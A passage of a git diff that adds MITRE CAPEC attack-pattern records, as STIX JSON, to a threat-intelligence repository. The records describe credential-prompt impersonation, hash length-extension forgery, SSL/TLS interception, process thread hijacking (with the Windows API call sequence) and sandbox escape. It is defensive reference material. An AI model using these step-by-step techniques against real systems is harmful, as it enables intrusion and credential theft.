task list for Microsoft Outlook in an attempt to determine when the application may prompt the user to enter their credentials to view encrypted email. Once the task is executed, the adversary impersonates the credential prompt to obtain the user's Microsoft Outlook encryption credentials. These credentials can then be leveraged by the adversary to read a user's encrypted email.", + "An adversary prompts a user to authorize an elevation of privileges, implying that a background task needs additional permissions to execute. The user accepts the privilege elevation, allowing the adversary to execute additional malware or tasks with the user's privileges." + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Determine suitable tasks to exploit: Determine what tasks exist on the target system that may result in a user providing sensitive information.

    2. Techniques
    Determine what tasks prompt a user for their credentials.
    Determine what tasks may prompt a user to authorize a process to execute with elevated privileges.

Exploit

  1. Impersonate Task: Impersonate a legitimate task, either expected or unexpected, in an attempt to gain user credentials or to ride the user's privileges.

    2. Techniques
    Prompt a user for their credentials, while making the user believe the credential request is legitimate.
    Prompt a user to authorize a task to run with elevated privileges, while making the user believe the request is legitimate.
", + "x_capec_extended_description": "\n When impersonating an expected task, the adversary monitors the task list maintained by the operating system and waits for a specific legitimate task to become active. Once the task is detected, the malicious application launches a new task in the foreground that mimics the user interface of the legitimate task. At this point, the user thinks that they are interacting with the legitimate task that they started, but instead they are interacting with the malicious application. Once the adversary's goal is reached, the malicious application can exit, leaving the original trusted application visible and the appearance that nothing out of the ordinary has occurred.\n A second approach entails the adversary impersonating an unexpected task, but one that may often be spawned by legitimate background processes. For example, an adversary may randomly impersonate a system credential prompt, implying that a background process requires authentication for some purpose. The user, believing they are interacting with a legitimate task, enters their credentials or authorizes the use of their stored credentials, which the adversary then leverages for nefarious purposes. This type of attack is most often used to obtain sensitive information (e.g., credentials) from the user, but may also be used to ride the user's privileges.\n ", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_parent_of_refs": [ + "attack-pattern--f7a0e7bd-d24a-4390-b365-9e71f22e4e06" + ], + "x_capec_prerequisites": [ + "The adversary must already have access to the target system via some means.", + "A legitimate task must exist that an adversary can impersonate to glean credentials.", + "The user's privileges allow them to execute certain tasks with elevated privileges." + ], + "x_capec_resources_required": [ + "Malware or some other means to initially comprise the target system.", + "Additional malware to impersonate a legitimate task." + ], + "x_capec_skills_required": { + "Low": "Once an adversary has gained access to the target system, impersonating a task is trivial." + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--19f01fde-7707-4938-afb5-daa22bf8c93f.json b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--19f01fde-7707-4938-afb5-daa22bf8c93f.json new file mode 100644 index 0000000000000000000000000000000000000000..1d2ce5ae1f38a665624d8afdbb6af6b7b05b8aaf --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--19f01fde-7707-4938-afb5-daa22bf8c93f.json @@ -0,0 +1,29 @@ +{ + "id": "bundle--3663d783-93a2-4e67-a24c-5bfbdea74738", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack pattern has been deprecated. Please refer to CAPEC:30 - Hijacking a Privileged Thread of Execution.", + "external_references": [ + { + "external_id": "CAPEC-235", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/235.html" + } + ], + "id": "attack-pattern--19f01fde-7707-4938-afb5-daa22bf8c93f", + "modified": "2018-07-31T00:00:00.000Z", + "name": "DEPRECATED: Implementing a callback to system routine (old AWT Queue)", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_status": "Deprecated", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--1abd165a-57e9-4b78-9221-7b6fcdc57810.json b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--1abd165a-57e9-4b78-9221-7b6fcdc57810.json new file mode 100644 index 0000000000000000000000000000000000000000..6beda7bb8bc73641938088571130163bfc41f302 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--1abd165a-57e9-4b78-9221-7b6fcdc57810.json @@ -0,0 +1,89 @@ +{ + "id": "bundle--d7416c5e-20a5-4978-afce-4ba510867553", + "objects": [ + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n An adversary exploits missing or incorrectly configured access control within registers to read/write data that is not meant to be obtained or modified by a user.\n ", + "external_references": [ + { + "external_id": "CAPEC-680", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/680.html" + }, + { + "external_id": "CWE-1224", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1224.html" + }, + { + "external_id": "CWE-1231", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1231.html" + }, + { + "external_id": "CWE-1233", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1233.html" + }, + { + "external_id": "CWE-1262", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1262.html" + }, + { + "external_id": "CWE-1283", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1283.html" + }, + { + "description": "Brandon Hill, Huge Intel CPU Bug Allegedly Causes Kernel Memory Vulnerability With Up To 30% Performance Hit In Windows And Linux, 2018--01---02, David Altavilla and Hot Hardware, Inc", + "external_id": "REF-693", + "source_name": "reference_from_CAPEC", + "url": "https://hothardware.com/news/intel-cpu-bug-kernel-memory-isolation-linux-windows-macos" + } + ], + "id": "attack-pattern--1abd165a-57e9-4b78-9221-7b6fcdc57810", + "modified": "2021-10-21T00:00:00.000Z", + "name": "Exploitation of Improperly Controlled Registers", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--92cdcd3d-d734-4442-afc3-4599f261498b", + "attack-pattern--aac17300-6cdd-4f50-82c3-da5a01d225ac" + ], + "x_capec_consequences": { + "Confidentiality": [ + "Read Data" + ], + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_domains": [ + "Hardware", + "Hardware" + ], + "x_capec_example_instances": [ + "\n During a System-on-Chip's (SoC) secure boot process, the code to be authenticated is measured to determine the code's validity. This entails the one-way hash of the code binary being calculated and extended to the previous hash. The value obtained after completion of the boot flow is then stored in a register with the intent of later verifying this value to determine if the boot flow has been tampered with. However, the register being used does not prevent an adversary from modifying the register's contents, which can result in the adversary spoofing the measurement data used in the attestation process.\n " + ], + "x_capec_extended_description": "\n Hardware systems often utilize trusted lock bits to prevent a set of registers from being written to or to restrict a register to only being written to once. Registers are also frequently used to store sensitive data leveraged in additional security operations, such as secure booting, authenticating code, device attestation, and more. However, the access control mechanisms meant to protect these registers may be fully missing or ineffective due to misconfiguration. If an adversary is able to discover improper access controls surrounding registers, it could result in the adversary obtaining sensitive data and/or modifying data that is meant to be immutable. This can ultimately result in processes like secure boot being circumvented or in protected configurations being modified.\n ", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "Awareness of the hardware being leveraged.", + "Access to the hardware being leveraged." + ], + "x_capec_skills_required": { + "High": "Intricate knowledge of registers." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--1b75b059-c9ee-4c4d-b016-bafb20cce96b.json b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--1b75b059-c9ee-4c4d-b016-bafb20cce96b.json new file mode 100644 index 0000000000000000000000000000000000000000..2abf9ccdf928ba5a1b24a2c84617965f17bf7a1a --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--1b75b059-c9ee-4c4d-b016-bafb20cce96b.json @@ -0,0 +1,49 @@ +{ + "id": "bundle--183a7be5-bae0-4d0a-bac2-4503ce85a4d8", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary examines screenshot images created by iOS in an attempt to obtain sensitive information. This attack targets temporary screenshots created by the underlying OS while the application remains open in the background.", + "external_references": [ + { + "external_id": "CAPEC-498", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/498.html" + }, + { + "external_id": "CWE-359", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/359.html" + }, + { + "description": "Jonathan Zdziarksi, Hacking and Securing iOS Applications (First Edition), 2012, O'Reilly Media, Inc.", + "external_id": "REF-426", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--1b75b059-c9ee-4c4d-b016-bafb20cce96b", + "modified": "2023-01-24T00:00:00.000Z", + "name": "Probe iOS Screenshots", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--191fbdab-d3b3-4ffd-8829-51331c20eaa7" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_extended_description": "These images are used by iOS to aid in the visual transition between open applications and improve the user's experience with a device. An application can be at risk even if it properly protects sensitive information when at rest. If the application displays sensitive information on the screen, then the potential exists for iOS to unintentionally record that information in an image file. An adversary can retrieve these images either by gaining access to the image files, or by physically obtaining the device and leveraging the multitasking switcher interface. This attack differs from CAPEC-648, which targets intentional screenshots initiated by an end-user that are stored in the device's storage.", + "x_capec_prerequisites": [ + "This type of an attack requires physical access to a device to either excavate the image files (potentially by leveraging a Jailbreak) or view the screenshots through the multitasking switcher (by double tapping the home button on the device)." + ], + "x_capec_status": "Draft", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--1bc4fd64-65a6-41d4-ac68-8e3692eabe29.json b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--1bc4fd64-65a6-41d4-ac68-8e3692eabe29.json new file mode 100644 index 0000000000000000000000000000000000000000..50a0029ed069cfca97609b74ef01b0ced6aa9932 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--1bc4fd64-65a6-41d4-ac68-8e3692eabe29.json @@ -0,0 +1,71 @@ +{ + "id": "bundle--eb2cd750-14ab-4f5a-ae2a-ca236b54048b", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary utilizes a hash function extension/padding weakness, to modify the parameters passed to the web service requesting authentication by generating their own call in order to generate a legitimate signature hash (as described in the notes), without knowledge of the secret token sometimes provided by the web service.", + "external_references": [ + { + "external_id": "CAPEC-461", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/461.html" + }, + { + "external_id": "CWE-328", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/328.html" + }, + { + "external_id": "CWE-290", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/290.html" + }, + { + "description": "Thai Duong, Juliano Rizzo, Flickr's API Signature Forgery Vulnerability, 2009--09---28", + "external_id": "REF-398", + "source_name": "reference_from_CAPEC", + "url": "http://netifera.com/research/flickr_api_signature_forgery.pdf" + } + ], + "id": "attack-pattern--1bc4fd64-65a6-41d4-ac68-8e3692eabe29", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Web Services API Signature Forgery Leveraging Hash Function Extension Weakness", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--8f665166-dfd1-40cb-91e8-b78bee1ceb6a" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "To leverage an attack against the has function extension / padding weakness, consider the message to be passed to the web service is M (this message includes the parameters passed to the web service concatenated with the secret token / key bytes). The message M is hashed and that hash is passed to the web service and is used for authentication. The attacker does not know M, but can see Hash (M) and Length (M). The attacker can then compute Hash (M || Padding (M) || M') for any M'. The attacker does not know the entire message M, specifically the attacker does not know the secret bytes, but that does not matter. The attacker is still able to sign their own message M' and make the called web service verify the integrity of the message without an error." + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Find a vulnerable web service: The adversary finds a web service that uses a vulnerable authentication scheme, where an authentication token is concatenated with the parameters of a request and then hashed

    2. Techniques
    Read application documentation to learn about authentication schemes being used
    Observe web service traffic to look for vulnerable authentication schemes

Experiment

  1. Attempt adding padding to parameters: An adversary tests if they can simply add padding to the parameters of a request such that the request is technically changed, with the hash remaining the same

    2. Techniques
    Exploit the hash function extension / padding weakness with only padding to test the weakness

Exploit

  1. Add malicious parameters to request: Add malicious parameters to a captured request in addition to what is already present. Do this by exploiting the padding weakness of the hash function and send the request to the web service so that it believes it is authenticated and acts on the extra parameters.

    2. Techniques
    Exploit the hash function extension / padding weakness by adding malicious parameters to a web service request such that it is still deemed authentic
", + "x_capec_extended_description": "\n When web services require callees to authenticate, they sometimes issue a token / secret to the caller that the caller is to use to sign their web service calls. In one such scheme the caller, when constructing a request, would concatenate all of the parameters passed to the web service with the provided authentication token and then generate a hash of the concatenated string (e.g., MD5, SHA1, etc.). That hash then forms the signature that is passed to the web service which is used on the server side to verify the origin authenticity and integrity of the message. Because of the iterative design of the hash function, it is possible, from only the hash of a message and its length, for an adversary to conduct signature forgery by computing the hash of longer messages that start with the initial message and include the padding required for the initial message to reach a multiple of 512 bits. It is important to note that the attack not limited to MD5 and will work on other hash functions such as SHA1.\n ", + "x_capec_prerequisites": [ + "Web services check the signature of the API calls", + "Authentication tokens / secrets are shared between the server and the legitimate client", + "The API call signature is generated by concatenating the parameter list with the shared secret and hashing the result.", + "An iterative hash function like MD5 and SHA1 is used.", + "An attacker is able to intercept or in some other way gain access to the information passed between the legitimate client and the server in order to retrieve the hash value and length of the original message.", + "The communication channel between the client and the server is not secured via channel security such as TLS" + ], + "x_capec_resources_required": [ + "\n Access to a function to produce a hash (e.g., MD5, SHA1)\n Tools that allow the attacker to intercept a message between the client and the server, specifically the hash that is the signature and the length of the original message concatenated with the secret bytes\n " + ], + "x_capec_skills_required": { + "Medium": "Medium level of cryptography knowledge, specifically how iterative hash functions work. This is needed to select proper padding." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--1be52fc4-a498-4d01-9a68-b560e64e0abf.json b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--1be52fc4-a498-4d01-9a68-b560e64e0abf.json new file mode 100644 index 0000000000000000000000000000000000000000..e130716f2873d66d3920e926d31fede80c562885 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--1be52fc4-a498-4d01-9a68-b560e64e0abf.json @@ -0,0 +1,67 @@ +{ + "id": "bundle--5c75dd12-8ad6-4ca6-8e07-aaf506908f2d", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary takes advantage of incorrectly configured SSL/TLS communications that enables access to data intended to be encrypted. The adversary may also use this type of attack to inject commands or other traffic into the encrypted stream to cause compromise of either the client or server.", + "external_references": [ + { + "external_id": "CAPEC-217", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/217.html" + }, + { + "external_id": "CWE-201", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/201.html" + } + ], + "id": "attack-pattern--1be52fc4-a498-4d01-9a68-b560e64e0abf", + "modified": "2022-02-22T00:00:00.000Z", + "name": "Exploiting Incorrectly Configured SSL/TLS", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--861cfb48-ba7c-4568-86c9-43ac6985ac65" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Confidentiality": [ + "Read Data", + "Gain Privileges" + ] + }, + "x_capec_domains": [ + "Communications" + ], + "x_capec_example_instances": [ + "Using MITM techniques, an adversary launches a blockwise chosen-boundary attack to obtain plaintext HTTP headers by taking advantage of an SSL session using an encryption protocol in CBC mode with chained initialization vectors (IV). This allows the adversary to recover session IDs, authentication cookies, and possibly other valuable data that can be used for further exploitation. Additionally this could allow for the insertion of data into the stream, allowing for additional attacks (CSRF, SQL inject, etc) to occur." + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Determine SSL/TLS Configuration: Determine the SSL/TLS configuration of either the server or client being targeted, preferably both. This is not a hard requirement, as the adversary can simply assume commonly exploitable configuration settings and indiscriminately attempt them.

    2. Techniques
    If the target is a webpage, some of the SSL/TLS configuration can be viewed through the browser's security information, such as the key sizes and cipher being used.

Experiment

  1. Intercept Communication: Provide controlled access to the server by the client, by either providing a link for the client to click on, or by positioning one's self at a place on the network to intercept and control the flow of data between client and server, e.g. AiTM (adversary in the middle - CAPEC-94).

    2. Techniques
    Create a malicious webpage that looks identical to the target webpage, but routes client traffic to the server such that the adversary can observe the traffic and perform an adverary in the middle attack.
    If the adversary has access to the network that either the client or server is on, the can attempt to use a packet sniffer to perform an adversary in the middle attack.
    Install a packet sniffer through malware directly to a client device that can intercept SSL/TLS traffic and perform an adversary in the middle attack.

Exploit

  1. Capture or Manipulate Sensitive Data: Once the adversary has the ability to intercept the secure communication, they exploit the incorrectly configured SSL to view the encrypted communication. The adversary can choose to just record the secure communication or manipulate the data to achieve a desired effect.

    2. Techniques
    Use known exploits for old SSL and TLS versions.
    Use known exploits for weak ciphers such as DES and RC4.
", + "x_capec_extended_description": "SSL/TLS communications become vulnerable to this attack when they use outdated versions and insecure ciphers. Currently, all SSL versions are deprecated and TLS versions 1.0 and 1.1 are also deprecated due to being insecure. It is still possible for later versions of TLS to be insecure if they are configured with insecure ciphers such as 3DES or RC4.", + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "Access to the client/server stream." + ], + "x_capec_resources_required": [ + "The adversary needs the ability to sniff traffic, and optionally be able to route said traffic to a system where the sniffing of traffic can take place, and act upon the recovered traffic in real time." + ], + "x_capec_skills_required": { + "High": "The adversary needs real-time access to network traffic in such a manner that the adversary can grab needed information from the SSL stream, possibly influence the decided-upon encryption method and options, and perform automated analysis to decipher encrypted material recovered. Tools exist to automate part of the tasks, but to successfully use these tools in an attack scenario requires detailed understanding of the underlying principles." + }, + "x_capec_status": "Draft", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--1c4b22ea-6dfc-4a95-917e-a7f11f3d34eb.json b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--1c4b22ea-6dfc-4a95-917e-a7f11f3d34eb.json new file mode 100644 index 0000000000000000000000000000000000000000..d2eb28804d187cd06ff947b00f24ec8a86e7ffa5 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--1c4b22ea-6dfc-4a95-917e-a7f11f3d34eb.json @@ -0,0 +1,29 @@ +{ + "id": "bundle--adc359b7-c606-4cbc-ae52-8c22d081e426", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack pattern has been deprecated as it is a duplicate of CAPEC-448 : Embed Virus into DLL. Please refer to this other pattern going forward.", + "external_references": [ + { + "external_id": "CAPEC-450", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/450.html" + } + ], + "id": "attack-pattern--1c4b22ea-6dfc-4a95-917e-a7f11f3d34eb", + "modified": "2022-09-29T00:00:00.000Z", + "name": "DEPRECATED: Malware Propagation via USB U3 Autorun", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_status": "Deprecated", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--1cc991f7-9f62-4e6b-9e37-70fa23ab23e9.json b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--1cc991f7-9f62-4e6b-9e37-70fa23ab23e9.json new file mode 100644 index 0000000000000000000000000000000000000000..ec381a27f7661e07cd7fa96ea61a6f462137b11e --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--1cc991f7-9f62-4e6b-9e37-70fa23ab23e9.json @@ -0,0 +1,80 @@ +{ + "id": "bundle--98288ed9-c082-447c-a83d-8ec8669b6f61", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary hijacks a privileged thread of execution by injecting malicious code into a running process. By using a privleged thread to do their bidding, adversaries can evade process-based detection that would stop an attack that creates a new process. This can lead to an adversary gaining access to the process's memory and can also enable elevated privileges. The most common way to perform this attack is by suspending an existing thread and manipulating its memory.", + "external_references": [ + { + "external_id": "CAPEC-30", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/30.html" + }, + { + "external_id": "CWE-270", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/270.html" + }, + { + "description": "Process Injection: Thread Execution Hijacking", + "external_id": "T1055.003", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1055/003" + } + ], + "id": "attack-pattern--1cc991f7-9f62-4e6b-9e37-70fa23ab23e9", + "modified": "2021-10-21T00:00:00.000Z", + "name": "Hijacking a Privileged Thread of Execution", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--c05fff04-b965-4a11-9c18-379dac31969f" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Availability": [ + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Confidentiality": [ + "Gain Privileges", + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Integrity": [ + "Execute Unauthorized Commands (Run Arbitrary Code)" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "Adversary targets an application written using Java's AWT, with the 1.2.2 era event model. In this circumstance, any AWTEvent originating in the underlying OS (such as a mouse click) would return a privileged thread (e.g., a system call). The adversary could choose to not return the AWT-generated thread upon consuming the event, but instead leveraging its privilege to conduct privileged operations." + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Determine target thread: The adversary determines the underlying system thread that is subject to user-control

Experiment

  1. Gain handle to thread: The adversary then gains a handle to a process thread.

    2. Techniques
    Use the \"OpenThread\" API call in Windows on a known thread.
    Cause an exception in a java privileged block public function and catch it, or catch a normal signal. The thread is then hanging and the adversary can attempt to gain a handle to it.

  2. Alter process memory: Once the adversary has a handle to the target thread, they will suspend the thread and alter the memory using native OS calls.

    3. Techniques
    On Windows, use \"SuspendThread\" followed by \"VirtualAllocEx\", \"WriteProcessMemory\", and \"SetThreadContext\".

Exploit

  1. Resume thread execution: Once the process memory has been altered to execute malicious code, the thread is then resumed.

    2. Techniques
    On Windows, use \"ResumeThread\".
", + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "The application in question employs a threaded model of execution with the threads operating at, or having the ability to switch to, a higher privilege level than normal users", + "In order to feasibly execute this class of attacks, the adversary must have the ability to hijack a privileged thread. This ability includes, but is not limited to, modifying environment variables that affect the process the thread belongs to, or calling native OS calls that can suspend and alter process memory. This does not preclude network-based attacks, but makes them conceptually more difficult to identify and execute." + ], + "x_capec_resources_required": [ + "\n None: No specialized resources are required to execute this type of attack. The adversary needs to be able to latch onto a privileged thread.\n The adversary does, however, need to be able to program, compile, and link to the victim binaries being executed so that it will turn control of a privileged thread over to the adversary's malicious code. This is the case even if the adversary conducts the attack remotely.\n " + ], + "x_capec_skills_required": { + "High": "Hijacking a thread involves knowledge of how processes and threads function on the target platform, the design of the target application as well as the ability to identify the primitives to be used or manipulated to hijack the thread." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--1d1fb93d-ce79-4c64-9987-94577fb894ce.json b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--1d1fb93d-ce79-4c64-9987-94577fb894ce.json new file mode 100644 index 0000000000000000000000000000000000000000..2d066a3442167129c9c14d3587aac4fbbca9d4e7 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--1d1fb93d-ce79-4c64-9987-94577fb894ce.json @@ -0,0 +1,82 @@ +{ + "id": "bundle--97f28597-88a4-48e4-88b0-2f7fd1b9e4cd", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "The attacker may submit malicious code of another language to obtain access to privileges that were not intentionally exposed by the sandbox, thus escaping the sandbox. For instance, Java code cannot perform unsafe operations, such as modifying arbitrary memory locations, due to restrictions placed on it by the Byte code Verifier and the JVM. If allowed, Java code can call directly into native C code, which may perform unsafe operations, such as call system calls and modify arbitrary memory locations on their behalf. To provide isolation, Java does not grant untrusted code with unmediated access to native C code. Instead, the sandboxed code is typically allowed to call some subset of the pre-existing native code that is part of standard libraries.", + "external_references": [ + { + "external_id": "CAPEC-237", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/237.html" + }, + { + "external_id": "CWE-693", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/693.html" + }, + { + "description": "J. Cappos, J. Rasley, J. Samuel, I. Beschastnikh, C. Barsan, A. Krishnamurthy, T. Anderson, Retaining Sandbox Containment Despite Bugs in Privileged Memory-Safe Code, The 17th ACM Conference on Computer and Communications Security (CCS '10), 2010", + "external_id": "REF-91", + "source_name": "reference_from_CAPEC" + }, + { + "description": "Malware Protection Center: Threat Research and Response, 2007, Microsoft Corporation", + "external_id": "REF-92", + "source_name": "reference_from_CAPEC", + "url": "https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Exploit%3AJava%2FByteVerify.C" + } + ], + "id": "attack-pattern--1d1fb93d-ce79-4c64-9987-94577fb894ce", + "modified": "2020-12-17T00:00:00.000Z", + "name": "Escaping a Sandbox by Calling Code in Another Language", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--4abd48c8-f737-45db-bd7b-97d989ebd471" + ], + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism" + ], + "Accountability": [ + "Gain Privileges" + ], + "Authentication": [ + "Gain Privileges" + ], + "Authorization": [ + "Bypass Protection Mechanism", + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Gain Privileges" + ], + "Non-Repudiation": [ + "Gain Privileges" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "Exploit: Java/ByteVerify.C is a detection of malicious code that attempts to exploit a vulnerability in the Microsoft Virtual Machine (VM). The VM enables Java programs to run on Windows platforms. The Microsoft Java VM is included in most versions of Windows and Internet Explorer. In some versions of the Microsoft VM, a vulnerability exists because of a flaw in the way the ByteCode Verifier checks code when it is initially being loaded by the Microsoft VM. The ByteCode Verifier is a low level process in the Microsoft VM that is responsible for checking the validity of code - or byte code - as it is initially being loaded into the Microsoft VM. Java/ByteVerify.C attempts to download a file named \"msits.exe\", located in the same virtual directory as the Java applet, into the Windows system folder, and with a random file name. It then tries to execute this specific file. This flaw enables attackers to execute arbitrary code on a user's machine such as writing, downloading and executing additional malware. This vulnerability is addressed by update MS03-011, released in 2003." + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Probing: The attacker probes the target application to see whether calling code of another language is allowed within a sandbox.

    2. Techniques
    The attacker probes the target application to see whether calling code of another language is allowed within a sandbox.

  2. Analysis: The attacker analyzes the target application to get a list of cross code weaknesses in the standard libraries of the sandbox.

    3. Techniques
    The attacker analyzes the target application to get a list of cross code weaknesses in the standard libraries of the sandbox.

Experiment

  1. Verify the exploitable security weaknesses: The attacker tries to craft malicious code of another language allowed by the sandbox to verify the security weaknesses of the standard libraries found in the Explore phase.

    2. Techniques
    The attacker tries to explore the security weaknesses by calling malicious code of another language allowed by the sandbox.

Exploit

